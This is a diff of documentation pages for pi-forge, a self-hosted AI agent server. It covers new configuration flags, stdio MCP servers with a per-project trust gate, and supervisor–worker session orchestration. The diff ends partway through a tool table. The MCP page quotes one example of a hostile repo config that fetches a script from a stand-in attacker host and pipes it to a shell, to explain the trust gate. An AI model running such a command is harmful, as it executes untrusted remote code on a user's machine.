+(MIT). An agent prompt authored against that plugin works against
+this implementation unchanged.</p>
+<p>Implementation is independent. The TUI plugin can&#39;t render into a
+browser session (<code>ctx.hasUI</code> is false), so installing the plugin
+alongside pi-forge has no effect — pi-forge&#39;s <code>customTools</code>
+registration takes the <code>ask_user_question</code> slot for browser sessions.</p>
+<p>Prompt snippet and guidelines (the strings the model sees) are
+adapted from the plugin with attribution preserved in
+<code>packages/server/src/ask-user-question/prompt-strings.ts</code>. The
+plugin&#39;s wording has been tuned against real model behavior; matching
+it avoids regressions in tool-call quality.</p>
+
+    </main>
+  </div>
+
+  <button class="sidebar-toggle" id="sidebarToggle" aria-label="Toggle sidebar">&#9776;</button>
+
+  <script>
+    document.getElementById('mobileToggle').addEventListener('click', () => {
+      document.getElementById('navLinks').classList.toggle('open');
+    });
+    document.getElementById('sidebarToggle').addEventListener('click', () => {
+      document.getElementById('docsSidebar').classList.toggle('open');
+    });
+  </script>
+</body>
+</html>

--- a/docs/site/docs/configuration.html
+++ b/docs/site/docs/configuration.html
@@ -44,6 +44,12 @@
         <a href="mobile.html">Mobile</a>
         <a href="api.html">API Examples</a>
         <a href="mcp.html">MCP Servers</a>
+        <a href="webhooks.html">Webhooks</a>
+        <a href="orchestration.html">Session Orchestration</a>
+        <a href="processes.html">Background Processes</a>
+        <a href="todo.html">Todo Tool</a>
+        <a href="ask-user-question.html">Ask User Question</a>
+        <a href="quick-actions.html">Quick Actions</a>
         <a href="sse-events.html">SSE Events</a>
       </div>
       <div class="sidebar-section">
@@ -138,12 +144,22 @@ in <code>cli.ts</code>). The most-touched ones:</p>
 <tr>
 <td><code>MINIMAL_UI</code></td>
 <td><code>false</code></td>
-<td>Hide terminal / git / last-turn / providers / agent-settings panels. Frontend gate; server routes unchanged.</td>
+<td>Hide terminal / git / last-turn / providers / agent-settings panels. Frontend gate; server routes unchanged. ALSO hard-disables webhook configuration, session orchestration, and the quick-actions runner.</td>
 </tr>
 <tr>
 <td><code>TRUST_PROXY</code></td>
 <td><code>false</code></td>
 <td>Set when behind a reverse proxy so <code>req.ip</code> is the real client (required for per-user login rate limits).</td>
+</tr>
+<tr>
+<td><code>ORCHESTRATION_ENABLED</code></td>
+<td><code>false</code></td>
+<td>Surface the chat-view <code>Orch</code> toggle so sessions can opt in to supervisor mode (<code>orchestrate_*</code> tool group, worker spawning, inbox). Hard-disabled under <code>MINIMAL_UI</code> regardless. See <a href="./orchestration.md"><code>orchestration.md</code></a>.</td>
+</tr>
+<tr>
+<td><code>ORCHESTRATION_MAX_WORKERS_PER_SUPERVISOR</code></td>
+<td><code>8</code></td>
+<td>Per-supervisor live-worker cap. Bounded to <code>[1, 100]</code>.</td>
 </tr>
 </tbody></table>
 <p>Production-tuning knobs (rate limits, JWT lifetime, TLS / proxy posture)
@@ -395,7 +411,17 @@ internals, and override env vars.</p>
 reverse proxy</li>
 <li><a href="./mobile.md"><code>mobile.md</code></a> — mobile / PWA install</li>
 <li><a href="./containers.md"><code>containers.md</code></a> — container internals + bind mounts</li>
-<li><a href="./mcp.md"><code>mcp.md</code></a> — MCP server config reference</li>
+<li><a href="./mcp.md"><code>mcp.md</code></a> — MCP server config reference (remote + stdio)</li>
+<li><a href="./webhooks.md"><code>webhooks.md</code></a> — HTTPS POSTs on agent/session events</li>
+<li><a href="./orchestration.md"><code>orchestration.md</code></a> — supervisor sessions that
+spawn and coordinate worker sessions</li>
+<li><a href="./processes.md"><code>processes.md</code></a> — background-process tool the
+agent uses for dev servers, watchers, builds</li>
+<li><a href="./todo.md"><code>todo.md</code></a> — browser-native <code>todo</code> tool</li>
+<li><a href="./ask-user-question.md"><code>ask-user-question.md</code></a> — browser-native
+<code>ask_user_question</code> tool</li>
+<li><a href="./quick-actions.md"><code>quick-actions.md</code></a> — operator-defined chat
+toolbar chips (shell commands + prompt templates)</li>
 <li><a href="../SECURITY.md"><code>SECURITY.md</code></a> — <code>auth.json</code> key safety + threat model</li>
 </ul>
 

--- a/docs/site/docs/containers.html
+++ b/docs/site/docs/containers.html
@@ -44,6 +44,12 @@
         <a href="mobile.html">Mobile</a>
         <a href="api.html">API Examples</a>
         <a href="mcp.html">MCP Servers</a>
+        <a href="webhooks.html">Webhooks</a>
+        <a href="orchestration.html">Session Orchestration</a>
+        <a href="processes.html">Background Processes</a>
+        <a href="todo.html">Todo Tool</a>
+        <a href="ask-user-question.html">Ask User Question</a>
+        <a href="quick-actions.html">Quick Actions</a>
         <a href="sse-events.html">SSE Events</a>
       </div>
       <div class="sidebar-section">

--- a/docs/site/docs/deployment.html
+++ b/docs/site/docs/deployment.html
@@ -44,6 +44,12 @@
         <a href="mobile.html">Mobile</a>
         <a href="api.html">API Examples</a>
         <a href="mcp.html">MCP Servers</a>
+        <a href="webhooks.html">Webhooks</a>
+        <a href="orchestration.html">Session Orchestration</a>
+        <a href="processes.html">Background Processes</a>
+        <a href="todo.html">Todo Tool</a>
+        <a href="ask-user-question.html">Ask User Question</a>
+        <a href="quick-actions.html">Quick Actions</a>
         <a href="sse-events.html">SSE Events</a>
       </div>
       <div class="sidebar-section">

--- a/docs/site/docs/mcp.html
+++ b/docs/site/docs/mcp.html
@@ -4,7 +4,7 @@
   <meta charset="UTF-8">
   <meta name="viewport" content="width=device-width, initial-scale=1.0">
   <title>MCP Servers — pi-forge</title>
-  <meta name="description" content="Connecting external Model Context Protocol servers.">
+  <meta name="description" content="Remote and stdio Model Context Protocol servers, with per-project trust.">
   <link rel="icon" href="data:image/svg+xml,<svg xmlns='http://www.w3.org/2000/svg' viewBox='0 0 32 32'><rect x='1' y='1' width='30' height='30' rx='7' fill='%230d0d10'/><path d='M12 13 H20 M14 13 V21 M18 13 V21' stroke='%23e6e7eb' stroke-width='1.6' stroke-linecap='round' fill='none'/></svg>">
   <link rel="preconnect" href="https://fonts.googleapis.com">
   <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>
@@ -44,6 +44,12 @@
         <a href="mobile.html">Mobile</a>
         <a href="api.html">API Examples</a>
         <a href="mcp.html" class="active">MCP Servers</a>
+        <a href="webhooks.html">Webhooks</a>
+        <a href="orchestration.html">Session Orchestration</a>
+        <a href="processes.html">Background Processes</a>
+        <a href="todo.html">Todo Tool</a>
+        <a href="ask-user-question.html">Ask User Question</a>
+        <a href="quick-actions.html">Quick Actions</a>
         <a href="sse-events.html">SSE Events</a>
       </div>
       <div class="sidebar-section">
@@ -56,7 +62,7 @@
 
     <main class="docs-main">
       <h1>MCP Servers</h1>
-      <p class="docs-subtitle">Connecting external Model Context Protocol servers.</p>
+      <p class="docs-subtitle">Remote and stdio Model Context Protocol servers, with per-project trust.</p>
 <p>pi-forge connects to MCP servers and surfaces their tools to the
 agent. Configure from <strong>Settings → MCP</strong> or by editing config files.</p>
 <blockquote>
@@ -64,18 +70,38 @@ agent. Configure from <strong>Settings → MCP</strong> or by editing config fil
 <a href="../packages/server/src/mcp/"><code>packages/server/src/mcp/</code></a> — see
 <code>manager.ts</code> for the contract.</p>
 </blockquote>
-<h2>Scope</h2>
-<ul>
-<li><strong>Remote servers only.</strong> Transports: <code>streamable-http</code> (current MCP
-spec) and <code>sse</code> (legacy). The <code>auto</code> default tries StreamableHTTP
-first and falls back to SSE — covers
+<h2>Server kinds</h2>
+<p>Two kinds, discriminated by which fields you populate (not by an
+explicit <code>kind</code> field — this matches the Claude Desktop /
+pi-mcp-adapter convention so existing <code>.mcp.json</code> files work
+unchanged):</p>
+<table>
+<thead>
+<tr>
+<th>Kind</th>
+<th>Discriminator</th>
+<th>Transport</th>
+</tr>
+</thead>
+<tbody><tr>
+<td><strong>Remote</strong></td>
+<td><code>url</code> is set</td>
+<td><code>streamable-http</code> / <code>sse</code> (HTTP)</td>
+</tr>
+<tr>
+<td><strong>Stdio</strong></td>
+<td><code>command</code> is set</td>
+<td>pi-forge spawns the subprocess; speaks MCP over its stdin/stdout</td>
+</tr>
+</tbody></table>
+<p>Exactly one of <code>url</code> / <code>command</code> must be set per server. The
+<code>auto</code> remote transport (default) tries StreamableHTTP first and
+falls back to SSE — covers
 <a href="https://github.com/jlowin/fastmcp" target="_blank" rel="noopener noreferrer">fastmcp</a> servers regardless of
-which transport they expose.</li>
-<li><strong>stdio is not supported.</strong> Run stdio MCP servers as a separate
-process and expose them over HTTP/SSE.</li>
-<li><strong>Static-header auth only</strong> (Bearer tokens, custom headers). OAuth
-per-server consent flows are not implemented.</li>
-</ul>
+which transport they expose.</p>
+<p>Static-header auth (Bearer tokens, custom headers) for remote
+servers; explicit env-passthrough for stdio. OAuth per-server
+consent flows are not implemented.</p>
 <h2>Where servers live</h2>
 <p>Two layers, merged at session create time:</p>
 <table>
@@ -105,12 +131,19 @@ to swap a global server for a project-specific one).</p>
 <pre><code class="language-json">{
   &quot;disabled&quot;: false,
   &quot;servers&quot;: {
-    &quot;my-server&quot;: {
+    &quot;weather&quot;: {
       &quot;url&quot;: &quot;https://mcp.example.com/sse&quot;,
       &quot;transport&quot;: &quot;auto&quot;,
       &quot;enabled&quot;: true,
       &quot;headers&quot;: {
         &quot;Authorization&quot;: &quot;Bearer sk-...&quot;
+      }
+    },
+    &quot;everything&quot;: {
+      &quot;command&quot;: &quot;npx&quot;,
+      &quot;args&quot;: [&quot;-y&quot;, &quot;@modelcontextprotocol/server-everything&quot;],
+      &quot;env&quot;: {
+        &quot;OPENAI_API_KEY&quot;: &quot;sk-...&quot;
       }
     }
   }
@@ -122,6 +155,10 @@ shape, so existing files don&#39;t need rewriting:</p>
   &quot;mcpServers&quot;: {
     &quot;chrome-devtools&quot;: {
       &quot;url&quot;: &quot;https://mcp.example.com/sse&quot;
+    },
+    &quot;github&quot;: {
+      &quot;command&quot;: &quot;docker&quot;,
+      &quot;args&quot;: [&quot;run&quot;, &quot;-i&quot;, &quot;--rm&quot;, &quot;ghcr.io/github/github-mcp-server&quot;]
     }
   }
 }
@@ -132,41 +169,117 @@ shape, so existing files don&#39;t need rewriting:</p>
 <tr>
 <th>Field</th>
 <th>Type</th>
+<th>Kind</th>
 <th>Default</th>
 <th>Notes</th>
 </tr>
 </thead>
 <tbody><tr>
-<td><code>url</code></td>
-<td>string</td>
-<td>(required)</td>
-<td>The MCP endpoint URL.</td>
-</tr>
-<tr>
-<td><code>transport</code></td>
-<td><code>&quot;auto&quot;</code> | <code>&quot;streamable-http&quot;</code> | <code>&quot;sse&quot;</code></td>
-<td><code>&quot;auto&quot;</code></td>
-<td>Connection probe order. <code>auto</code> tries StreamableHTTP first.</td>
-</tr>
-<tr>
 <td><code>enabled</code></td>
 <td>boolean</td>
+<td>both</td>
 <td><code>true</code></td>
 <td>Disabled servers don&#39;t connect or contribute tools.</td>
 </tr>
 <tr>
+<td><code>url</code></td>
+<td>string</td>
+<td>remote</td>
+<td>—</td>
+<td>The MCP endpoint URL. Required for remote servers.</td>
+</tr>
+<tr>
+<td><code>transport</code></td>
+<td><code>&quot;auto&quot;</code> | <code>&quot;streamable-http&quot;</code> | <code>&quot;sse&quot;</code></td>
+<td>remote</td>
+<td><code>&quot;auto&quot;</code></td>
+<td>Connection probe order. <code>auto</code> tries StreamableHTTP first.</td>
+</tr>
+<tr>
 <td><code>headers</code></td>
 <td><code>Record&lt;string, string&gt;</code></td>
+<td>remote</td>
 <td>(none)</td>
 <td>Forwarded on every MCP RPC. Treated as secret on read — <code>GET /mcp/servers</code> returns <code>***REDACTED***</code> for every value.</td>
 </tr>
 <tr>
+<td><code>command</code></td>
+<td>string</td>
+<td>stdio</td>
+<td>—</td>
+<td>Executable to spawn. Resolved via PATH if not absolute. Required for stdio servers.</td>
+</tr>
+<tr>
+<td><code>args</code></td>
+<td><code>string[]</code></td>
+<td>stdio</td>
+<td><code>[]</code></td>
+<td>CLI args appended to <code>command</code>.</td>
+</tr>
+<tr>
+<td><code>env</code></td>
+<td><code>Record&lt;string, string&gt;</code></td>
+<td>stdio</td>
+<td>(none)</td>
+<td>Subprocess env. Pi-forge env is <strong>not</strong> inherited by default (see &quot;Stdio env&quot; below). Treated as secret on read.</td>
+</tr>
+<tr>
+<td><code>cwd</code></td>
+<td>string</td>
+<td>stdio</td>
+<td>project path (project scope) / pi-forge cwd (global)</td>
+<td>Subprocess working directory.</td>
+</tr>
+<tr>
 <td><code>disabled</code></td>
 <td>boolean (top-level)</td>
+<td>—</td>
 <td><code>false</code></td>
-<td>Master kill-switch. When <code>true</code>, NO MCP tools reach the agent regardless of per-server <code>enabled</code>. Surfaced as the toggle at the top of Settings → MCP.</td>
+<td>Master kill-switch. When <code>true</code>, NO MCP tools reach the agent regardless of per-server <code>enabled</code>.</td>
 </tr>
 </tbody></table>
+<h2>Stdio env passthrough</h2>
+<p>The MCP SDK&#39;s <code>StdioClientTransport</code> does <strong>not</strong> inherit the
+pi-forge process env by default — it uses <code>getDefaultEnvironment()</code>,
+a small allowlist (PATH, HOME, locale vars, terminal vars). This is
+safe-by-default: an <code>OPENAI_API_KEY</code> you set in your shell for
+pi-forge itself won&#39;t silently leak to every stdio MCP subprocess.</p>
+<p>pi-forge preserves that behavior: the subprocess sees
+<code>getDefaultEnvironment() ∪ cfg.env</code> (your explicit overrides win on
+collision). Pass through any credential the MCP server needs via the
+<code>env</code> field — e.g. <code>&quot;GITHUB_TOKEN&quot;: &quot;ghp_...&quot;</code>.</p>
+<h2>Stdio trust gate (project-scope only)</h2>
+<p>Project-scoped stdio entries are <strong>gated behind an explicit per-
+project trust decision</strong>. Until the operator grants trust via the
+UI, the entry sits in <code>trust_required</code> state — pi-forge does NOT
+spawn the subprocess and no tools surface. Global stdio entries
+(written to <code>${FORGE_DATA_DIR}/mcp.json</code> by the operator
+themselves) and remote project entries are never gated.</p>
+<p><strong>Why.</strong> A hostile repo could ship <code>.mcp.json</code> with a stdio entry
+like <code>{ &quot;command&quot;: &quot;curl&quot;, &quot;args&quot;: [&quot;evil.com/x.sh&quot;, &quot;|&quot;, &quot;sh&quot;] }</code>
+and silently launch a subprocess on next session-create. Remote
+entries have a smaller blast radius (they need a network endpoint
+to do anything); stdio is local code execution with whatever env
+you pass through.</p>
+<p><strong>Grant flow.</strong> First time you open a project that contains stdio
+entries, Settings → MCP surfaces a banner:</p>
+<blockquote>
+<p>This project wants to spawn N stdio MCP servers.</p>
+</blockquote>
+<p>Click <strong>Trust this project</strong>. Trust is recorded in
+<code>${FORGE_DATA_DIR}/mcp-stdio-trust.json</code> (per project, indefinite —
+no expiry). Subsequent loads bypass the gate. Adding NEW stdio
+entries to an already-trusted project does <strong>not</strong> re-prompt — the
+trust decision is scoped to &quot;this project&#39;s <code>.mcp.json</code> is allowed
+to declare stdio servers&quot;; the file&#39;s contents are part of the
+codebase you already trust. If you want per-entry confirmation,
+revoke trust first.</p>
+<p><strong>Revoke.</strong> Settings → MCP, click <strong>Revoke</strong> on the trusted banner.
+This disconnects every project-scoped MCP server and clears the
+trust record. The next session-create will re-apply the gate to
+stdio entries.</p>
+<p><strong>Cascade.</strong> Deleting the project removes its trust entry too
+(project-manager cleanup hook).</p>
 <h2>How the agent sees the tools</h2>
 <p>Each MCP tool from a connected, enabled server becomes a pi
 <code>ToolDefinition</code> namespaced as <strong><code>&lt;server&gt;__&lt;tool&gt;</code></strong> — the prefix
@@ -190,11 +303,50 @@ first <code>createAgentSession</code> for that project, then cached. Edits
 require restart or a Probe to pick up.</li>
 <li><strong>Save.</strong> <code>PUT</code> from Settings rewrites <code>mcp.json</code> atomically
 (<code>.tmp</code> + <code>rename</code>, mode 0600), then re-syncs the connection pool
-(reconnects entries whose URL / transport / headers changed).</li>
+(reconnects entries whose connection-critical fields changed —
+URL/transport/headers for remote, command/args/env/cwd for stdio).</li>
+<li><strong>Trust grant.</strong> Spawns every gated stdio entry in the project
+immediately. Remote entries are unaffected.</li>
+<li><strong>Trust revoke.</strong> Tears down the entire project pool (including
+remote entries — the next <code>ensureProjectLoaded</code> re-applies the
+gate on stdio entries).</li>
 <li><strong>Master toggle.</strong> Flipping it off doesn&#39;t disconnect anything —
 future <code>createAgentSession</code> calls skip the <code>customTools</code> injection.
 Live sessions keep the tools they booted with.</li>
 </ul>
+<h2>Connection states</h2>
+<table>
+<thead>
+<tr>
+<th>State</th>
+<th>Meaning</th>
+</tr>
+</thead>
+<tbody><tr>
+<td><code>idle</code></td>
+<td>Configured but not yet connected (transient — connect attempt is in flight).</td>
+</tr>
+<tr>
+<td><code>connecting</code></td>
+<td>Handshake in progress.</td>
+</tr>
+<tr>
+<td><code>connected</code></td>
+<td>Tools listed and available to sessions.</td>
+</tr>
+<tr>
+<td><code>error</code></td>
+<td>Connect failed (or the subprocess crashed). <code>lastError</code> carries the message.</td>
+</tr>
+<tr>
+<td><code>disabled</code></td>
+<td><code>enabled: false</code> — won&#39;t connect or contribute tools.</td>
+</tr>
+<tr>
+<td><code>trust_required</code></td>
+<td>Project-scope stdio entry waiting for the operator to grant trust.</td>
+</tr>
+</tbody></table>
 <h2>Header status badge</h2>
 <p>The badge next to <strong>Settings</strong> shows a colored dot + <code>MCP X/Y</code>:</p>
 <ul>
@@ -207,19 +359,35 @@ Settings → MCP)</li>
 <p>Hidden when no servers are configured and in <code>MINIMAL_UI</code> mode.</p>
 <h2>Troubleshooting</h2>
 <p><strong>Status stuck in <code>error</code></strong> — Settings → MCP, expand the row, read
-<code>lastError</code>. Common causes: wrong URL, missing <code>Authorization</code>
-header, server returning 4xx on <code>tools/list</code>. <strong>Probe</strong> forces a
-reconnect + tool re-list.</p>
-<p><strong>Both transports fail</strong> — pin <code>transport</code> explicitly. The <code>auto</code>
-probe round-trip wastes ~100 ms per reconnect when only one transport
-actually works.</p>
-<p><strong>Headers show <code>***REDACTED***</code></strong> — read-path sentinel, not real
-data. The on-disk file still has the real value. On save, a sentinel
-value preserves the prior secret; a new value overwrites it (same
-pattern as <code>models.json</code>).</p>
+<code>lastError</code>. Common causes:</p>
+<ul>
+<li><strong>Remote:</strong> wrong URL, missing <code>Authorization</code> header, server
+returning 4xx on <code>tools/list</code>.</li>
+<li><strong>Stdio:</strong> command not found (resolve via absolute path or check
+PATH passthrough), missing required env var, subprocess crashed at
+startup (the child&#39;s stderr is inherited — check the pi-forge log).</li>
+</ul>
+<p><strong>Probe</strong> forces a reconnect + tool re-list.</p>
+<p><strong>Stdio entry stuck in <code>trust_required</code></strong> — that&#39;s the per-project
+trust gate. Settings → MCP, click <strong>Trust this project</strong> on the
+amber banner. See &quot;Stdio trust gate&quot; above.</p>
+<p><strong>Both remote transports fail</strong> — pin <code>transport</code> explicitly. The
+<code>auto</code> probe round-trip wastes ~100 ms per reconnect when only one
+transport actually works.</p>
+<p><strong>Headers / env show <code>***REDACTED***</code></strong> — read-path sentinel, not
+real data. The on-disk file still has the real value. On save, a
+sentinel value preserves the prior secret; a new value overwrites it
+(same pattern as <code>models.json</code>).</p>
 <p><strong>Tools don&#39;t appear after editing project <code>.mcp.json</code></strong> — the file
 is read once per project per server lifetime. Probe the row or
 restart pi-forge.</p>
+<p><strong>Stdio subprocess &quot;ENOENT&quot; / &quot;command not found&quot;</strong> — the SDK&#39;s
+<code>StdioClientTransport</code> resolves <code>command</code> via the subprocess&#39;s PATH.
+PATH is included in the default-allowlist passthrough, so it&#39;s
+whatever PATH pi-forge itself sees. If you&#39;re running pi-forge from
+a desktop launcher / systemd, PATH may not include <code>~/.local/bin</code>,
+<code>nvm</code>, <code>pyenv</code>, etc. — use an absolute path in <code>command</code> or extend
+PATH via the <code>env</code> field.</p>
 <h2>API surface</h2>
 <p>All routes under <code>/api/v1/mcp/</code>:</p>
 <table>
@@ -243,12 +411,12 @@ restart pi-forge.</p>
 <tr>
 <td><code>GET</code></td>
 <td><code>/mcp/servers[?projectId=…]</code></td>
-<td>Global config (redacted) + status</td>
+<td>Global config (redacted) + status; <code>?projectId</code> adds <code>stdioTrust</code></td>
 </tr>
 <tr>
 <td><code>PUT</code></td>
 <td><code>/mcp/servers/:name</code></td>
-<td>Upsert a global server</td>
+<td>Upsert a global server (remote OR stdio — pick by <code>url</code> vs <code>command</code>)</td>
 </tr>
 <tr>
 <td><code>DELETE</code></td>
@@ -265,6 +433,16 @@ restart pi-forge.</p>
 <td><code>/mcp/tools?projectId=…</code></td>
 <td>Flat tool list available to the project&#39;s sessions</td>
 </tr>
+<tr>
+<td><code>POST</code></td>
+<td><code>/mcp/trust/:projectId</code></td>
+<td>Grant project stdio trust (retries every gated entry)</td>
+</tr>
+<tr>
+<td><code>DELETE</code></td>
+<td><code>/mcp/trust/:projectId</code></td>
+<td>Revoke project stdio trust (unloads the project pool)</td>
+</tr>
 </tbody></table>
 <p>Request/response schemas in the Swagger UI at <code>/api/docs</code>.</p>
 <h2>See also</h2>
@@ -272,6 +450,7 @@ restart pi-forge.</p>
 <li><a href="./configuration.md"><code>configuration.md</code></a> — env vars + per-project overrides</li>
 <li><a href="./architecture.md"><code>architecture.md</code></a> — where the MCP manager sits</li>
 <li><a href="../packages/server/src/mcp/manager.ts"><code>packages/server/src/mcp/manager.ts</code></a> — integration contract</li>
+<li><a href="../packages/server/src/mcp/stdio-trust.ts"><code>packages/server/src/mcp/stdio-trust.ts</code></a> — trust-gate rationale</li>
 </ul>
 
     </main>

--- a/docs/site/docs/mobile.html
+++ b/docs/site/docs/mobile.html
@@ -44,6 +44,12 @@
         <a href="mobile.html" class="active">Mobile</a>
         <a href="api.html">API Examples</a>
         <a href="mcp.html">MCP Servers</a>
+        <a href="webhooks.html">Webhooks</a>
+        <a href="orchestration.html">Session Orchestration</a>
+        <a href="processes.html">Background Processes</a>
+        <a href="todo.html">Todo Tool</a>
+        <a href="ask-user-question.html">Ask User Question</a>
+        <a href="quick-actions.html">Quick Actions</a>
         <a href="sse-events.html">SSE Events</a>
       </div>
       <div class="sidebar-section">

--- a/docs/site/docs/orchestration.html
+++ b/docs/site/docs/orchestration.html
@@ -1,0 +1,413 @@
+<!DOCTYPE html>
+<html lang="en">
+<head>
+  <meta charset="UTF-8">
+  <meta name="viewport" content="width=device-width, initial-scale=1.0">
+  <title>Session Orchestration — pi-forge</title>
+  <meta name="description" content="Supervisor sessions that spawn, observe, and coordinate worker sessions in the same project.">
+  <link rel="icon" href="data:image/svg+xml,<svg xmlns='http://www.w3.org/2000/svg' viewBox='0 0 32 32'><rect x='1' y='1' width='30' height='30' rx='7' fill='%230d0d10'/><path d='M12 13 H20 M14 13 V21 M18 13 V21' stroke='%23e6e7eb' stroke-width='1.6' stroke-linecap='round' fill='none'/></svg>">
+  <link rel="preconnect" href="https://fonts.googleapis.com">
+  <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>
+  <link href="https://fonts.googleapis.com/css2?family=Inter:wght@400;500;600;700;800&family=JetBrains+Mono:wght@400;500&display=swap" rel="stylesheet">
+  <link rel="stylesheet" href="../style.css">
+</head>
+<body>
+  <header class="site-header">
+    <div class="header-inner">
+      <a href="../index.html" class="logo">
+        <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 32 32" fill="none" aria-hidden="true">
+  <rect x="1" y="1" width="30" height="30" rx="7" fill="#0d0d10"/>
+  <path d="M9 11 L6 16 L9 21" stroke="#10b981" stroke-width="1.6" stroke-linecap="round" stroke-linejoin="round" fill="none"/>
+  <path d="M23 11 L26 16 L23 21" stroke="#10b981" stroke-width="1.6" stroke-linecap="round" stroke-linejoin="round" fill="none"/>
+  <path d="M12 13 H20 M14 13 V21 M18 13 V21" stroke="#e6e7eb" stroke-width="1.6" stroke-linecap="round" stroke-linejoin="round" fill="none"/>
+</svg>
+        pi-forge
+      </a>
+      <nav class="nav-links" id="navLinks">
+        <a href="../index.html#features">Features</a>
+        <a href="../index.html#quickstart">Quick Start</a>
+        <a href="architecture.html">Docs</a>
+        <a href="https://github.com/Devin-Marks/pi-forge" class="nav-cta">GitHub</a>
+      </nav>
+      <button class="mobile-toggle" id="mobileToggle" aria-label="Toggle menu">&#9776;</button>
+    </div>
+  </header>
+
+  <div class="docs-layout">
+    <aside class="docs-sidebar" id="docsSidebar">
+      <div class="sidebar-section">
+        <h4>Documentation</h4>
+        <a href="architecture.html">Architecture</a>
+        <a href="configuration.html">Configuration</a>
+        <a href="containers.html">Containers</a>
+        <a href="deployment.html">Deployment</a>
+        <a href="mobile.html">Mobile</a>
+        <a href="api.html">API Examples</a>
+        <a href="mcp.html">MCP Servers</a>
+        <a href="webhooks.html">Webhooks</a>
+        <a href="orchestration.html" class="active">Session Orchestration</a>
+        <a href="processes.html">Background Processes</a>
+        <a href="todo.html">Todo Tool</a>
+        <a href="ask-user-question.html">Ask User Question</a>
+        <a href="quick-actions.html">Quick Actions</a>
+        <a href="sse-events.html">SSE Events</a>
+      </div>
+      <div class="sidebar-section">
+        <h4>Project</h4>
+        <a href="https://github.com/Devin-Marks/pi-forge">GitHub</a>
+        <a href="https://github.com/Devin-Marks/pi-forge/blob/main/CHANGELOG.md">Changelog</a>
+        <a href="https://github.com/Devin-Marks/pi-forge/blob/main/SECURITY.md">Security</a>
+      </div>
+    </aside>
+
+    <main class="docs-main">
+      <h1>Session Orchestration</h1>
+      <p class="docs-subtitle">Supervisor sessions that spawn, observe, and coordinate worker sessions in the same project.</p>
+<p>A session can act as a <strong>supervisor</strong> that spawns, observes,
+messages, interrupts, and kills other sessions in the same project.
+Off by default; the operator opts in at the instance level with an
+env flag, and each session that should run as a supervisor opts in
+separately from the chat-view toolbar.</p>
+<blockquote>
+<p>Different from <strong>pi-subagents.</strong> Subagents are LLM-internal child
+agents scoped to one tool call within a single session. Orchestrated
+workers are full first-class sessions — they show up in the session
+picker, have their own transcripts, can be opened directly in the
+browser, and survive after the supervisor ends.</p>
+</blockquote>
+<h2>Why turn it on</h2>
+<p>Two concrete workflows the feature is built for:</p>
+<ul>
+<li><strong>Supervisor watching peers.</strong> A lead session breaks down a goal,
+spawns one worker per discrete task, watches the worker inbox for
+turn-ends and ask-user-question requests, and coordinates the
+overall progress. Useful when work decomposes cleanly into
+parallel chunks (audit N files, test N components, port N
+modules).</li>
+<li><strong>Handoff pipeline.</strong> Session A finishes its piece of work,
+spawns session B with a <code>contextSummary</code> of what it learned, and
+detaches. Useful when work is sequential but the context window
+pressure on a single session would force premature compaction.</li>
+</ul>
+<h2>Topology</h2>
+<p>Strict <strong>hub-and-spoke at depth=1.</strong></p>
+<ul>
+<li>The supervisor is the hub. Every worker reports to it via the
+inbox; workers do not see each other.</li>
+<li>A worker cannot become a supervisor (depth is capped at 1). This
+is enforced at <code>enableSupervisor()</code> and at <code>registerWorker()</code> —
+the store rejects with <code>depth_limit_exceeded</code> if you try.</li>
+<li>Hub-and-spoke is enforced <strong>by the tool surface</strong>, not by a
+permission check: workers literally don&#39;t get the
+<code>orchestrate_*</code> tools, so there&#39;s no API for them to express
+worker→worker comms. There&#39;s nothing to enforce because there&#39;s
+nothing to express.</li>
+<li><strong>Same-project only</strong> in v1. Cross-project orchestration is
+intentionally out of scope — it would complicate the data model
+for a use case the design hasn&#39;t seen yet.</li>
+</ul>
+<h2>Enabling — two-tier opt-in</h2>
+<h3>1. Instance flag (operator)</h3>
+<p>Set the env var:</p>
+<pre><code class="language-bash">ORCHESTRATION_ENABLED=true
+</code></pre>
+<p>Or in <code>docker/.env</code>:</p>
+<pre><code>ORCHESTRATION_ENABLED=true
+</code></pre>
+<p>This makes the chat-view <code>Orch</code> toggle button render. It does NOT
+enable supervisor mode for any session — that&#39;s the second gate.</p>
+<p><strong>Hard-disabled under <code>MINIMAL_UI=true</code></strong> regardless of this flag.
+MINIMAL_UI deployments are locked-down by design; orchestration
+opens a tool surface the operator probably doesn&#39;t want end users
+touching.</p>
+<h3>2. Per-session toggle (user)</h3>
+<p>Open a session, click the <code>Orch</code> button in the chat-view toolbar,
+click <strong>Enable supervisor mode</strong>. The server rebuilds the live
+AgentSession in-place (same SessionManager, fresh <code>customTools</code>,
+SSE clients stay attached) so the <code>orchestrate_*</code> tools become
+available immediately — no reload, no reconnect.</p>
+<p>Disable the same way to drop the tools. Disabling also detaches
+every linked worker (they survive as standalone sessions) and
+clears the supervisor&#39;s inbox.</p>
+<h2>Tool surface</h2>
+<p>The supervisor&#39;s agent gets eight new tools (all prefixed
+<code>orchestrate_</code>):</p>
+<table>
+<thead>
+<tr>
+<th>Tool</th>
+<th>Purpose</th>
+</tr>
+</thead>
+<tbody><tr>
+<td><code>orchestrate_spawn_worker</code></td>
+<td>Create a new worker session with a task. <code>name</code> is required so the picker stays legible; optional <code>contextSummary</code> prepends handoff context to the initial prompt.</td>
+</tr>
+<tr>
+<td><code>orchestrate_list_workers</code></td>
+<td>Current state per worker (streaming / idle / cold) with message counts and last-activity timestamps.</td>
+</tr>
+<tr>
+<td><code>orchestrate_read_worker</code></td>
+<td>Fetch the worker&#39;s most recent messages, rendered as a readable transcript. Default <code>limit</code> is <strong>1</strong> (latest message only) — bump only when one-message context isn&#39;t enough.</td>
+</tr>
+<tr>
+<td><code>orchestrate_send_to_worker</code></td>
+<td>Inject a message into the worker&#39;s prompt stream. <code>mode</code> chooses between <code>prompt</code> (default, new turn or queue), <code>steer</code> (interrupt current turn — for course-correction), <code>followUp</code> (queue until idle — for next-task assignment).</td>
+</tr>
+<tr>
+<td><code>orchestrate_interrupt_worker</code></td>
+<td>Abort the worker&#39;s current turn. Session stays live.</td>
+</tr>
+<tr>
+<td><code>orchestrate_kill_worker</code></td>
+<td>Dispose the worker session. Optional <code>deleteOnDisk: true</code> also removes the <code>.jsonl</code>.</td>
+</tr>
+<tr>
+<td><code>orchestrate_detach_worker</code></td>
+<td>Drop the supervisor↔worker link; the worker continues as a standalone session.</td>
+</tr>
+<tr>
+<td><code>orchestrate_read_inbox</code></td>
